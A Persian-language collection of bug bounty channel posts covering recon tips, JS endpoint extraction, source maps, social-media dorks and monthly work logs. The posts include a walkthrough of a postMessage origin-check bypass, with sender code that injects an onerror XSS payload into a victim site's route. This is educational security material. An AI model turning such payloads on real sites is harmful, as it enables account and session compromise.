این پلی‌لیست «Live Recon Sundays» از NahamSec فوق‌العادست کلی مصاحبه‌ و لایو هانت با هانترها و ریسرچرهای خفن داره.
لایو هانت هایی که با هانتر های مختلف انجام میده رو بهتون پیشنهاد میکنم.

https://www.youtube.com/playlist?list=PLKAaMVNxvLmAkqBkzFaOxqs3L66z2n8LA

چجوری از فایل های .js میتونیم به اندپوینت برسیم ؟

1 - استفاده از رجکس :‌

grep -Eo '("|\')(/[^"']+)("|\')' *.js | sort -u

2 - پیدا کردن request های get و http Method های دیگه :

fetch("
axios.get("
{ method: "POST" }

3 - پیدا کردن بر اساس یه سری کلمات کلیدی :

API-related keywords like endpoint
url
request
fetch
ajax
GET
POST 
XMLHttpRequest()

برای موارد بیشتر میتونید یه سر به این notion ای که ساختم بزنید :

https://snapdragon-copper-dd1.notion.site/Finding-Hidden-Endpoints-223a797be4c680889370c563ddb30f7a?source=copy_link

این ماه هم با ۱۳۹ ساعت کار تموم شد. اونجوری که باید پیش نرفت و کارای اداری و دیپلم دهنمون رو سرویس کرد
بریم که مهر ماه رو بترکونیم

سورس مپ جاوااسکریپت چیه ؟
سورس‌مپ‌های جاوااسکریپت عملاً نقشه‌ای از کدها قبل از obfuscation هستن. هر وقت سورس‌مپ رو داشته باشی کد فرانت‌اند خوانایی راحتی داره و دیباگ‌کردنش خیلی ساده‌تر و سرراست‌تر میشه.

تو این سایت هم میتونید source map رو آپلود کنید تا براتون مرتب اش کنه :
https://evanw.github.io/source-map-visualization/

لینک هایی برای مطالعه بیشتر :‌
Article-1
Article-2
Article-3

چجوری تو این کد میتونیم به Dom Xss برسیم ؟‌

__d("goURIOnWindow", ["ConstUriUtils", "FBLogger", "err"], (function(a, b, c, d, e, f, g) {
    "use strict";
    function a(a, b) {
        var e = typeof b === "string" ? d("ConstUriUtils").getUri(b) : b;
        if (e)
            a.location = e.toString();
        else {
            a = "Invalid URI " + b.toString() + " provided to goURIOnWindow";
            c("FBLogger")("comet_infra").blameToPreviousFrame().mustfix(a)
        }
    }
    g["default"] = a
}
), 98);

بعد از اینکه تلاشتون رو کردید بشینید رایتاپش رو هم بخونید :

https://ysamm.com/2023/01/29/dom-xss-in-instant-games-due-to-improper-verification-of-supplied-urls.html

امروز داشتم یه ریپورتی در رابطه با postMessage میخوندم که دوست داشتم اینجا بازش کنم :
ما یه همچین listener ای رو داریم :

Receiver: function (e) {
  var n, r = this.get("replaceRoute"), i = this.get("referrer");
  if (!i || e.origin === normalize(i)) {
    try { n = JSON.parse(e.data); } catch (u) {}
    // ...
  }
}

خب حالا مشکل این listener چیه ؟ توی این قسمت if (!i داره چک میکنه که اگه referrer خالی باشه این شرط پاس بشه و مشکلی نداره پس اگه referrer ما خالی باشه دیگه به شرط بعدی e.origin نمیرسه و نکته مهمی که اینجا هست اینه که توی postMessage هیچ هدر referrer ای ست نمیشه پس اگه من یه sender داشته باشم به راحتی میتونم به اینجا Message بفرستم.
پس کد sender ما میشه :

win = window.open("https://transact.victim.com/");
win.postMessage(JSON.stringify({
                action: "replaceRoute",
                route: "application_error",
                model: { error: 500, title: "injected", message: "from attacker" }
            }), "*");

حالا تو ادامه اش هم اومده بود یه route دیگه پیدا کرده بود که اونجا xss میخورد :

win.postMessage(JSON.stringify({
                action: "replaceRoute",
                route: "voucher.multi-product-details",
                model: {
                    eligible: true,
                    sku: {
                        id: 0, longDescription: `
                            <img src=x onerror='alert(document.domain)'>`
                    }
                }
            }), "*");

A Hacker's Notebook Part II : Real Techniques from the World of Bug Bounty

https://snapdragon-copper-dd1.notion.site/A-Hacker-s-Notebook-Real-Techniques-from-the-World-of-Bug-Bounty-Part-II-28fa797be4c68046999af6b668a736a4?pvs=73

By: @bugbountyhints && GitBook_s.t.iss.one

تو این نوشن سعی کردیم نکات مفیدی رو از رایتاپ ها جمع کنیم و قرار بدیم

این ماه هم تقریبا با ۲۱۹ ساعت کار تموم شد.
تمرکز اصلی ایم روی هانت، js و oauth بود که تونستم تا یه لولی بهترشون کنم
این ماه هم یکم دوست دارم رو قسمت غیر فنی داستان تمرکز کنم و البته oauth و js رو بهتر کنم

یکی از تکنیک هایی که تو ریکان استفاده میکنم، در آوردن ساب دامین از سوشال مدیا هستش که نتیجه خوبی هم ازش میگیرم
یه سری dork جنریت میکنم و دامین مورد نظر خودم رو توش میزارم، مثل :

site:x.com "domain.tld"
site:instagram.com "domain.tld"
site:linkedin.com "domain.tld"
site:reddit.com "domain.tld"

این‌جوری به یه سری توییت یا پست قدیمی و جدید می‌رسم که راجع به ساب‌دامینی کامنت گذاشتن و بعد میرم چک می‌کنم که بالا هستن یا نه.

این ماه هم با ۱۴۶ ساعت کار تموم شد.
تایم کاری و هانتم نسبت به ماه قبل خیلی پایین اومد
ولی از نظر یادگیری ۲ برابر ماه پیش بوده

فول تایم هانتر بودن اینجوریه که یه ماه مثل کارتون خوابا زندگی میکنی بعد یه شب بهت چند تا باگ میخوره ورق عوض میشه

خلاصه که اگه فول تایم هانت میکنید این مدیریت مالی رو جدی بگیرید

ابزار subScraper از XSS-Rat. خودم فعلا بالا نیاوردمش ولی از شات هایی که گذاشته بود میشه گفت که ابزار باحال و کار راه بندازیه.
https://github.com/The-XSS-Rat/subScraper?tab=readme-ov-file

اینم توییت خود XSS-Rat که راجب ابزار یه سری توضیحات داده :‌
https://x.com/theXSSrat/status/2001406924684956063